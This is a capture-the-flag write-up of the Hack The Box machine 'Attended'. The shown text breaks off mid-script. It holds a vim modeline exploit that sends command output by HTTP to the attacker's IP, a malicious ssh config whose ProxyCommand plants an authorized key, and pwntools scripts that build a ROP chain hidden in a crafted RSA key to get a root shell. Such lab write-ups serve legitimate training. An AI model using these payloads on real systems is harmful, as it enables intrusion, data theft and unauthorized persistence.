Attended
Attended was on of the hardest box I ever even touched. It helped me to improve my pwn skills a lot so it's 100% worth it.

Recon

There are only 2 ports opened on the host, 25 (smtp), and 22 (ssh)โ€Œ
Let's setup an smtp server and see if we get an answer from any user. I use FakeSMTP:
After striking my head against the wall a bit, I decided to mail the creators of the box :).
โ€Œ
I first tried guly and got the following response:
Mon, 03 May 2021 17:18:04 -0400 (EDT)
Received: from attended.htb (attended.htb [192.168.23.2])
by attendedgw.htb (Postfix) with ESMTP id 7560E32CCF
for <[email protected]>; Mon, 3 May 2021 23:22:50 +0200 (CEST)
Content-Type: multipart/alternative;
boundary="===============8290742098115745222=="
MIME-Version: 1.0
Subject: Re: test Mon, 03 May 2021 17:16:04 -0400
โ€‹
--===============8290742098115745222==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
โ€‹
hello, thanks for writing.
i'm currently quite busy working on an issue with freshness and dodging any email from everyone but him. i'll get back in touch as soon as possible.
โ€‹
โ€‹
---
guly
โ€‹
OpenBSD user since 1995
Vim power user
โ€‹
/"\
\ / ASCII Ribbon Campaign
X against HTML e-mail
/ \ against proprietary e-mail attachments
โ€‹
--===============8290742098115745222==--
โ€Œ
Saying he's busy with freshness (the other co-creator of attended). At this point I thought that maybe mailing guly prettending to be freshness might result in a different response
โ€Œ
, and as expected
Tue, 02 Mar 2021 07:13:02 -0500 (EST)
Received: from attended.htb (attended.htb [192.168.23.2])
by attendedgw.htb (Postfix) with ESMTP id 5803732CCF
for <[email protected]>; Tue, 2 Mar 2021 13:22:33 +0100 (CET)
Content-Type: multipart/alternative;
boundary="===============3652242623055986180=="
MIME-Version: 1.0
Subject: Re: test Tue, 02 Mar 2021 07:11:59 -0500
โ€‹
--===============3652242623055986180==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
โ€‹
hi mate, could you please double check your attachment? looks like you forgot to actually attach anything :)
โ€‹
p.s.: i also installed a basic py2 env on gw so you can PoC quickly my new outbound traffic restrictions. i think it should stop any non RFC compliant connection.
โ€‹
โ€‹
---
guly
โ€‹
OpenBSD user since 1995
Vim power user
โ€‹
/"\
\ / ASCII Ribbon Campaign
X against HTML e-mail
/ \ against proprietary e-mail attachments
โ€‹
--===============3652242623055986180==--
โ€Œ
After reading this, I tried sending and email with an attachment:
swaks --to [email protected] --from [email protected] --attach dummy.txt
โ€Œ
and we got a third response:
Tue, 02 Mar 2021 07:28:03 -0500 (EST)
Received: from attended.htb (attended.htb [192.168.23.2])
by attendedgw.htb (Postfix) with ESMTP id 3229A32CCF
for <[email protected]>; Tue, 2 Mar 2021 13:37:35 +0100 (CET)
Content-Type: multipart/alternative;
boundary="===============4711056454254821347=="
MIME-Version: 1.0
Subject: Re: test Tue, 02 Mar 2021 07:27:18 -0500
โ€‹
--===============4711056454254821347==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
โ€‹
thanks dude, i'm currently out of the office but will SSH into the box immediately and open your attachment with vim to verify its syntax.
if everything is fine, you will find your config file within a few minutes in the /home/shared folder.
test it ASAP and let me know if you still face that weird issue.
โ€‹
โ€‹
---
guly
โ€‹
OpenBSD user since 1995
Vim power user
โ€‹
/"\
\ / ASCII Ribbon Campaign
X against HTML e-mail
/ \ against proprietary e-mail attachments
โ€‹
--===============4711056454254821347==--
โ€Œ
From all these emails we can extract a few infos:โ€Œ
  • Guly expects an attachment from freshness
  • He'll open it with vim
  • We have python2 on the system
  • There are outbound traffic restrictions
  • The attachment is a config file (likely ssh)
  • The freshness user will test the config file in /home/shared
โ€Œ
So our attack chain would likely be the following:โ€Œ
send a malicious attachment to get code execution -> Bypass traffic restrictions via data exfiltration -> Create a malicious ssh_config file -> Finally login as a user and work our way from thereโ€Œ
Of course that wasn't my fist guess, it was actually the result of many frustrated attempts.โ€Œ

Vim

Searching for vim CVEs this one seems the most promissing one:
So I tried sending an attachment that would make the host ping my box, which seems the most reasonable test since there are traffic restrictions on the target
:!ping -c1 10.10.15.10||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
โ€Œ
And it works!โ€Œ
After playing around a bit with the exploit I tried to exfiltrate data via http using python2 (at this point I was praying for the request lib to available on the host).โ€Œ
Here is the first thing I sent:
:!python2 -c "import requests,base64,subprocess;requests.get('http://10.10.15.10/'+base64.b64encode(subprocess.check_output('ls -la',shell=True)))"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
โ€Œ
And listened on port 80. This will retreive the base64 encoded output of the command, After decoding it we get:
total 60
drwxr-x--- 4 guly guly 512 May 3 23:16 .
drwxr-xr-x 5 root wheel 512 Jun 26 2019 ..
-rw-r--r-- 1 guly guly 87 Apr 13 2019 .Xdefaults
-rw-r--r-- 1 guly guly 771 Apr 13 2019 .cshrc
-rw-r--r-- 1 guly guly 101 Apr 13 2019 .cvsrc
-rw-r--r-- 1 guly guly 359 Apr 13 2019 .login
-rw-r--r-- 1 guly guly 175 Apr 13 2019 .mailrc
-rw-r--r-- 1 guly guly 215 Apr 13 2019 .profile
drwx------ 2 root wheel 512 Jun 26 2019 .ssh
-rw------- 1 guly guly 0 Dec 15 17:05 .viminfo
-rw-r----- 1 guly guly 13 Jun 26 2019 .vimrc
-rwxrwxrwx 1 root guly 6789 Dec 4 09:07 gchecker.py
-rw------- 1 guly guly 0 May 3 23:16 mbox
drwxr-xr-x 2 guly guly 512 Jun 26 2019 tmp
โ€‹โ€Œ
The tmp folder inside guly's home seems interesting...
total 32
drwxr-xr-x 2 guly guly 512 Jun 26 2019 .
drwxr-x--- 4 guly guly 512 May 3 23:17 ..
-rwxr-x--- 1 guly guly 12288 Jun 26 2019 .config.swp
โ€Œ
It contains a vim swap of a config file, this will possibly hint us on how our malicious config must look like.โ€Œ
This is not simply ascii text so use strings instead of cat.
ServerAliveInterval 60
TCPKeepAlive yes
ControlPersist 4h
ControlPath /tmp/%[email protected]%h:%p
ControlMaster auto
User freshness
Host *
โ€Œ
This confirms my theory that we need to drop a config file at /home/shared and it will be used as a ssh_config file. We can execute commands whenever our config file is used by abusing some special configurations such as ProxyCommand.โ€Œ
If we create a /home/shared/config file with ProxyCommand to write a ssh key to authorized_keys we might be able to login as freshness.
Host *
User freshness
ControlMaster auto
ControlPath /tmp/%[email protected]%h:%p
ControlPersist 4h
TCPKeepAlive yes
ServerAliveInterval 60
ProxyCommand echo ssh-ed25519 AAAAC3[...]qEUi > /home/freshness/.ssh/authorized_keys
โ€Œ
This is the config file I used.โ€Œ
We can try to write it with the above attachment and then we wait for freshness to test it.
!python2 -c "import requests,base64,subprocess;requests.get('http://10.10.14.27/'+base64.b64encode(subprocess.check_output('echo \'Host *\n User freshness\n ControlMaster auto\n ControlPath /tmp/\%[email protected]\%h:\%p\n ControlPersist 4h\n TCPKeepAlive yes\n ServerAliveInterval 60\n ProxyCommand echo ssh-ed25519 AAAAC3[...]qEUi > /home/freshness/.ssh/authorized_keys\' >> /home/shared/config; cat /home/shared/config',shell=True)))"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
โ€Œ
And finally this works and we can login with ssh.
โ€Œ
So far so good. Pretty nice warm up, now let's get to the really crazy part...โ€Œ

Authkeys

There is a note.txt file at /home/freshness/authkeys:
on attended:
[ ] enable authkeys command for sshd
[x] remove source code
[ ] use nobody
on attendedgw:
[x] enable authkeys command for sshd
[x] remove source code
[ ] use nobody
And also an ELF executable file called authkeys.โ€Œ
The note suggests that there is another host in the network. Reading /etc/hosts confirms that:
127.0.0.1 localhost
::1 localhost
192.168.23.2 attended.attended.htb attended
192.168.23.1 attendedgw.attended.htb attendedgw
โ€Œ
The term "Authkeys" rings a bell, there is a configuration that can be set on sshd_config to process data received from private/public key authentication on ssh. Reading /etc/ssh/sshd_config we see the following lines:
#AuthorizedKeysCommand /usr/local/sbin/authkeys %f %h %t %k
#AuthorizedKeysCommandUser root
โ€Œ
Those are commented out but from the note we can assume that they aren't on attendedgw.โ€Œ
Attendedgw isn't listening on port 22, so the natural thing is to test 2222 instead, which confirms ssh is listening, but running a portscan is also an option.โ€Œ
Now let's try to understand the arguments passed to the authkeys program. sshd_config(5) - OpenBSD manual pagesman.openbsd.orgโ€Œ
Reading the documentation we can easily understand what %f %h %t %k are:
TOKENS
Arguments to some keywords can make use of tokens, which are expanded at runtime:
โ€‹
%%
A literal โ€˜%โ€™.
%D
The routing domain in which the incoming connection was received.
%F
The fingerprint of the CA key.
%f
The fingerprint of the key or certificate.
%h
The home directory of the user.
%i
The key ID in the certificate.
%K
The base64-encoded CA key.
%k
The base64-encoded key or certificate for authentication.
%s
The serial number of the certificate.
%T
The type of the CA key.
%t
The key or certificate type.
%U
The numeric user ID of the target user.
%u
The username.
โ€Œ
Testing with the following parameters we can see that there is a buffer overflow on the %k parameter (The base64 encoded public key):
./authkeys SHA256:n/aWYVFoUcXYWaCdwdrWILyNe+0MSvNsJcrGUJIw9lU /home/freshness/.ssh ssh-rsa YWFh[...]YWFhYQ==
Evaluating key...
Bus error (core dumped)
โ€Œ
Opening the binary on gdb on a openbsd vm and setting a ton of base64 encoded A's as our %k argument we can overwrite the rsp register to whatever we want and start work on a rop chain:
rax 0x0 0
rbx 0xffffffffffffffff -1
rcx 0x0 0
rdx 0x6161616161616161 7016996765293437281
rsi 0x0 0
rdi 0x0 0
rbp 0x7f7ffffea500 0x7f7ffffea500
rsp 0x7f7ffffea4f8 0x7f7ffffea4f8
r8 0x7f7ffffeaf7c 140187732455292
r9 0x7f7ffffea893 140187732453523
r10 0x7f7ffffea1f0 140187732451824
r11 0x1616161616161610 1591483802437686800
r12 0x7f7ffffea6a2 140187732453026
r13 0x0 0
r14 0x0 0
r15 0x0 0
rip 0x40036b 0x40036b
eflags 0x10246 66118
cs 0x2b 43
ss 0x23 35
ds 0x23 35
es 0x23 35
fs 0x23 35
gs 0x23 35
(gdb) x/gx $rsp
0x7f7ffffea4f8: 0x6161616161616161
โ€Œ
Before that we must consider that we'll send a private key that will then be converted to a public key, so thinking of the crafting of the key before building an exploit will prevent us from doing some extra work to adapt our padding to the correct format.โ€Œ

SSH-RSA

We know how RSA keys are built, now we have to think on how to make a private key that will produce a public key containing our payload. A RSA key is composed by p, q, n and e where p and q are any two prime numbers, n is the product of those two and e is an integer such that 1 < e < phi and gcd(e, phi) = 1; that is, e and phi are coprime.โ€Œ
So the value we have most control over and is present in both the private and the public key is e.โ€Œ
Let's make that e = our payload, p = a very large prime, q = another very large prime, n = p*q, phi = (p-1)*(q-1), this is the famous Euler totient function. To generate a private key we also need to find d, which is the modular multiplicative inverse of e modulo phi, and the crt_coef, which is the modular multiplicative inverse of p modulo q.โ€Œ
The last thing we must care about is that our payload (e) needs to be coprime to phi, so we can add a few bytes at the end and only modify those, so our payload will keep the same. I'll be using sagemath, which basically let's you run python with crazy alegebra functions.
Now show me the code!
# Definitions e = 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410000000000000000
โ€‹
p = 12404736742956334104048739740543781491387397925357666314393547398793990104049147280960606378099168493978156483394776197735758036630616576101704741271667061
q = 8606776466136541733893490508345546407164354378988272245974715524609469554972533654953396144138389065496004349155417300105606877160037374530561063507312721
n = p*q
phi = (p-1)*(q-1)
โ€Œ
Here are our first definitions, now we need to use an algoritm to modifly the last few bytes of e until we hit a coprime to phi:
# Definitions
e = 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410000000000000000
p = 12404736742956334104048739740543781491387397925357666314393547398793990104049147280960606378099168493978156483394776197735758036630616576101704741271667061
q = 8606776466136541733893490508345546407164354378988272245974715524609469554972533654953396144138389065496004349155417300105606877160037374530561063507312721
n = p*q
phi = (p-1)*(q-1)
crt_coef = inverse_mod(p, q)
โ€‹
# e coprime to phi
_e = e
for i in range(1, 2**(8*4), 2):
__e = _e + i
if gcd(phi, __e) == 1:
e = __e
break
โ€Œ
I'm using the gcd(phi, e) = 1 condition I mentioned before to confirm that e is good to go. The reason for my range to be 1, 2e16 is that 2e16 is the biggest possible number that would perfectly fit the bytes we freed by adding 8 null bytes to the end of our payload.โ€Œ
Now we want to calculate our inverses.
# Definitions
e = 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410000000000000000
p = 12404736742956334104048739740543781491387397925357666314393547398793990104049147280960606378099168493978156483394776197735758036630616576101704741271667061
q = 8606776466136541733893490508345546407164354378988272245974715524609469554972533654953396144138389065496004349155417300105606877160037374530561063507312721
n = p*q
phi = (p-1)*(q-1)
crt_coef = inverse_mod(p, q)
โ€‹
# e coprime to phi
_e = e
for i in range(1, 2**(8*4), 2):
__e = _e + i
if gcd(phi, __e) == 1:
e = __e
break
โ€‹
# Find d
d = inverse_mod(e, phi)
โ€Œ
And we can finally build a key!
from Crypto.PublicKey import RSA
import os
โ€‹
# Definitions
e = 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410000000000000000
p = 12404736742956334104048739740543781491387397925357666314393547398793990104049147280960606378099168493978156483394776197735758036630616576101704741271667061
q = 8606776466136541733893490508345546407164354378988272245974715524609469554972533654953396144138389065496004349155417300105606877160037374530561063507312721
n = p*q
phi = (p-1)*(q-1)
crt_coef = inverse_mod(p, q)
โ€‹
# e coprime to phi
_e = e
for i in range(1, 2**(8*4), 2):
__e = _e + i
if gcd(phi, __e) == 1:
e = __e
break
โ€‹
# Find d
d = inverse_mod(e, phi)
โ€‹
# Build Key
rsa_params = (int(n), int(e), int(d), int(p), int(q), int(crt_coef))
key = RSA.construct(rsa_params ,consistency_check=False).exportKey().decode()
โ€‹
# Write key file
if os.path.isfile('ropkey.pem'):
os.unlink('ropkey.pem')
with open('ropkey.pem', 'w') as f:
f.write(key)
os.popen('chmod 400 ropkey.pem')
โ€Œ
Now let's extract our public key and test it on gdb to see if our overflow works as expected.
โ€Œ
I first tried 850 A's as padding and we can see that we wrote 81 bytes after rsp, so now we just need to reajust that to be 761 A's + 8 B's to see if wee can perfectly overwrite rsp.
(gdb) x/100gx $rsp
0x7f7fffff4928: 0x4141414141414141 0x4141414141414141
0x7f7fffff4938: 0x4141414141414141 0x4141414141414141
0x7f7fffff4948: 0x4141414141414141 0x4141414141414141
0x7f7fffff4958: 0x4141414141414141 0x4141414141414141
0x7f7fffff4968: 0x4141414141414141 0x4141414141414141
0x7f7fffff4978: 0x4141414141414141 0x0000000000000041
โ€Œ
It works, the rsp value is overwritten an on the first return after the overflow it changes rip to bbbbbbbb which means we can start building our rop chain.โ€Œ

ROP

Using ropper to search for useful gadgets we can see that we can probably make a syscall. Also keep in mind that the user data is stored in the data section before being written onto the stack, which is good since there is no PIE, so we can store arguments we might want to use there, making ROP easier.
0x00000000004003c1: add al, ch; or byte ptr [rax], al; add byte ptr [rax], al; mov eax, 1; xor rdi, rdi; syscall;
0x00000000004003c6: add byte ptr [rax + 1], bh; xor rdi, rdi; syscall;
0x00000000004003c6: add byte ptr [rax + 1], bh; xor rdi, rdi; syscall; ret;
0x00000000004003c4: add byte ptr [rax], al; add byte ptr [rax + 1], bh; xor rdi, rdi; syscall;
0x00000000004003c4: add byte ptr [rax], al; add byte ptr [rax + 1], bh; xor rdi, rdi; syscall; ret;
0x00000000004003c0: add byte ptr [rax], al; call 0x3cf; mov eax, 1; xor rdi, rdi; syscall;
0x00000000004003c5: add byte ptr [rax], al; mov eax, 1; xor rdi, rdi; syscall;
0x00000000004003c5: add byte ptr [rax], al; mov eax, 1; xor rdi, rdi; syscall; ret;
0x00000000004003ca: add byte ptr [rax], al; xor rdi, rdi; syscall;
0x00000000004003ca: add byte ptr [rax], al; xor rdi, rdi; syscall; ret;
0x00000000004003c8: add dword ptr [rax], eax; add byte ptr [rax], al; xor rdi, rdi; syscall;
0x00000000004003c8: add dword ptr [rax], eax; add byte ptr [rax], al; xor rdi, rdi; syscall; ret;
0x00000000004003c2: call 0x3cf; mov eax, 1; xor rdi, rdi; syscall;
0x00000000004003c2: call 0x3cf; mov eax, 1; xor rdi, rdi; syscall; ret;
0x00000000004003c7: mov eax, 1; xor rdi, rdi; syscall;
0x00000000004003c7: mov eax, 1; xor rdi, rdi; syscall; ret;
0x00000000004003c3: or byte ptr [rax], al; add byte ptr [rax], al; mov eax, 1; xor rdi, rdi; syscall;
0x00000000004003c3: or byte ptr [rax], al; add byte ptr [rax], al; mov eax, 1; xor rdi, rdi; syscall; ret;
0x00000000004003cd: xor edi, edi; syscall;
0x00000000004003cd: xor edi, edi; syscall; ret;
0x00000000004003cc: xor rdi, rdi; syscall;
0x00000000004003cc: xor rdi, rdi; syscall; ret;
0x00000000004003cf: syscall;
0x00000000004003cf: syscall; ret;
โ€Œ
Our challenge now is to control rax, rdi, rsi and rdx. rax will be the syscall number; we want it to be 59, which is execve() on openbsd; rdi needs to be "/bin/sh", that string is obviously not available on the program but we can put it on our padding; rsi needs to be a pointer to an array of arguments and finally rdx is an optional argument that we want to be null.โ€Œ

RAX

Looking for gadgets to control rax anything that helps manipulating rax, eax, ax or al is useful since those are all the same register but each one allows controling a different amount of bytes.
Two gadget can be chained to change rax to whatever we wantโ€Œ
000000000400370: shr eax, 1; ret;โ€Œ
andโ€Œ
0x000000000040036d: not al; adc cl, 0xe8; ret;โ€Œ
At the moment of the crash rax is set to 0x0, shr (shift right) moves all bytes to the right and not swaps 0's and 1's.โ€Œ
With all we can control 8 bits so:โ€Œ
00000000 --> not --> 11111111โ€Œ
And for each shift we move everything to the right so:โ€Œ
1111111 --> shr --> 0111111โ€Œ
If we want to go from 0 to 59 we need the following operations:โ€Œ
00000000 --> not --> 11111111 1111111 --> shr --> 0111111 0111111 --> shr --> 0011111 0011111 --> not --> 1100000 1100000 --> shr --> 01100000 01100000 --> not --> 10011111 10011111 --> shr --> 01001111 01001111 --> shr --> 00100111 00100111 --> shr --> 00010011 00010011 --> not --> 11101100 11101100 --> shr --> 01110110 01110110 --> shr --> 00111011โ€Œ
Now let's start developing an exploit to change rax to 59:
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
junk = 761*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
โ€‹
# Payload
payload = junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax #last gadget is just a dummy so far
โ€‹
print(payload.hex())
โ€Œ
The above code creates our rop chain, if we feed it to the key generator and test our exploit we successfully changed rax to 59:
(gdb) i r
rax 0x3b 59
now we can move on to the next registers.โ€Œ

RDI/RSI/RDX

There is also a chain of gadgets that allow us to control rsi and, as we'll see later on, also control rdi and rdx.โ€Œ
0x000000000040036a: pop rdx; ret;โ€Œ
Let's us easily change the value of rdx.โ€Œ
000000000040037b: movss xmm0, dword ptr [rdx];โ€Œ
Copies a dword pointer from rdx to xmm0.โ€Œ
0x0000000000400380: cvtss2si esi, xmm0; ret;โ€Œ
Converts a float from xmm0 and stores the result on esi.โ€Œ
And finally:โ€Œ
0x0000000000400367: mov rdi, rsi; pop rdx; ret;โ€Œ
Copies rsi to rdiโ€Œ
cvtss2si expects a float value and movss expects a dword pointer. We want rdi to be "/bin/sh", so we store that value in memory by modifying our padding. Then we need to store a pointer to that address as a float value because it will be converted back afterwards. Finally we just pop rdi with that value's addressโ€Œ
Let's take it slow and start by checking where "/bin/sh" is written to:
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
#junk = 761*b'A'
junk = 753*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
bin_sh = b'/bin/sh\x00'
โ€‹
# Payload
payload = bin_sh
payload += junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax #last gadget is just a dummy so far
โ€‹
print(payload.hex())
โ€Œ
First we consult the vaddr of a memory section out payload overwrote:
>> rabin2 -z pwn/authkeys
[Strings]
nth paddr vaddr len size section type string
โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•โ€•
0 0x00001000 0x00601000 189 190 .data ascii Too bad, Wrong number of arguments!\nEvaluating key...\nSorry, this damn thing is not complete yet. I'll finish asap, promise!\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
โ€Œ
And inspect that address (and the next few ones) in gdb:
0x6010c0: 0x2d68737307000000 0x2f61030000617372
0x6010d0: 0x410068732f6e6962 0x4141414141414141
0x6010e0: 0x4141414141414141 0x4141414141414141
โ€Œ
This reveals we are one byte off, we can try to fix this by adding a sigle byte before our string.
0x6010d0: 0x0068732f6e69622f 0x4141414141414141
0x6010e0: 0x4141414141414141 0x4141414141414141
โ€Œ
And now our string is perfectly written to 0x6010d0. Now we need to create a convert 0x6010d0 to a floar value and also store it in memory.โ€Œ
We first convert our address and convert it to a integer and feed it to the float to hex converter.
โ€Œ
So the float value in hex will be 0x4ac021a0, which we'll store in the memory.
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
#junk = 761*b'A'
junk = 744*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
bin_sh = b'/bin/sh\x00'
bin_sh_addr_float = p64(0x4ac021a0)
โ€‹
# Payload
payload = b'A'
payload += bin_sh
payload += bin_sh_addr_float
payload += junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax #last gadget is just a dummy so far
โ€‹
print(payload.hex())
โ€Œ
Now we should also see our float value in the data section.
0x6010d0: 0x0068732f6e69622f 0x000000004ac021a0
0x6010e0: 0x4141414141414141 0x4141414141414141
โ€Œ
Now we just have to pop rdx with 0x6010d0 and throw in the gadgets that were mentioned before:
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
#junk = 761*b'A'
junk = 744*b'A'
#junk = 736*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
bin_sh = b'/bin/sh\x00'
bin_sh_addr_float = p64(0x4ac021a0)
bin_sh_addr_float_addr = p64(0x6010d8)
bin_sh_addr_float_addr_addr = p64(0x6010e0)
pop_rdx = p64(0x000000000040036a)
movss_xmm0_dword_ptr_rdx = p64(0x000000000040037b)
cvtss2si_esi_xmm0 = p64(0x0000000000400380)
mov_rdi_rsi = p64(0x0000000000400367)
โ€‹
# Payload
payload = b'A'
payload += bin_sh
payload += bin_sh_addr_float
payload += junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += pop_rdx
payload += bin_sh_addr_float_addr
payload += movss_xmm0_dword_ptr_rdx
payload += cvtss2si_esi_xmm0
payload += mov_rdi_rsi
โ€‹
print(payload.hex())
โ€‹
โ€Œ
At this point we can start writing our array of arguments to the data section. argv[0] is the name of the program, so also "/bin/sh", argv[1] will be "-c", and argv[2] can be any command we want. Our command can be, for example:
mkdir /root/.ssh; echo "{your public key}" > /root/.ssh/authorized_keys
โ€Œ
With the following code:
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
#junk = 761*b'A'
#junk = 744*b'A'
junk = 600*b'A'
#junk = 736*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
bin_sh = b'/bin/sh\x00'
bin_sh_addr_float = p64(0x4ac021a0)
bin_sh_addr_float_addr = p64(0x6010d8)
bin_sh_addr_float_addr_addr = p64(0x6010e0)
pop_rdx = p64(0x000000000040036a)
movss_xmm0_dword_ptr_rdx = p64(0x000000000040037b)
cvtss2si_esi_xmm0 = p64(0x0000000000400380)
mov_rdi_rsi = p64(0x0000000000400367)
โ€‹
# /bin/sh args
arg1 = b'-c'.ljust(8, b'\x00') # -c
arg2 = b'mkdir /root/.ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBleIY99tS9NgpR7d8bXCTKeyLqPU56qLH7Cc89uqEUi" > /root/.ssh/authorized_keys'.ljust(136, b'\x00')
print(len(arg2))
โ€‹
# /bin/sh arg addresses
โ€‹
# Payload
payload = b'A'
payload += bin_sh
payload += bin_sh_addr_float
payload += arg1
payload += arg2
payload += junk
payload += not_al
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += shr_eax
payload += not_al
payload += shr_eax
payload += shr_eax
payload += pop_rdx
payload += bin_sh_addr_float_addr
payload += movss_xmm0_dword_ptr_rdx
payload += cvtss2si_esi_xmm0
payload += mov_rdi_rsi
โ€‹
print(payload.hex())
โ€Œ
We can see our arguments in the data section:
0x6010d0: 0x0068732f6e69622f 0x000000004ac021a0
0x6010e0: 0x000000000000632d 0x722f207269646b6d
0x6010f0: 0x6873732e2f746f6f 0x22206f686365203b
0x601100: 0x353264652d687373 0x4141414120393135
0x601110: 0x6c3143617a4e3343 0x3545544e3149445a
0x601120: 0x656c424941414141 0x4e39537439395949
0x601130: 0x5862386437527067 0x50714c79654b5443
0x601140: 0x4337484c71363555 0x6955457175393863
0x601150: 0x6f6f722f203e2022 0x612f6873732e2f74
0x601160: 0x657a69726f687475 0x00007379656b5f64
โ€Œ
Now all we need to do is assign pointers to each of those arguments in an array.โ€Œ
With the following code we can write our array of pointers to each of our arguments:
#!/usr/bin/env python3
from pwn import *
โ€‹
# Junk
#junk = 761*b'A'
#junk = 744*b'A'
#junk = 600*b'A'
junk = 568*b'A'
#junk = 736*b'A'
โ€‹
# Gadgets
shr_eax = p64(0x0000000000400370)
not_al = p64(0x000000000040036d)
bin_sh = b'/bin/sh\x00'
bin_sh_addr_float = p64(0x4ac021a0)
bin_sh_addr_float_addr = p64(0x6010d8)
bin_sh_addr_float_addr_addr = p64(0x6010e0)
pop_rdx = p64(0x000000000040036a)
movss_xmm0_dword_ptr_rdx = p64(0x000000000040037b)
cvtss2si_esi_xmm0 = p64(0x0000000000400380)
mov_rdi_rsi = p64(0x0000000000400367)
zero = p64(0x0)
โ€‹
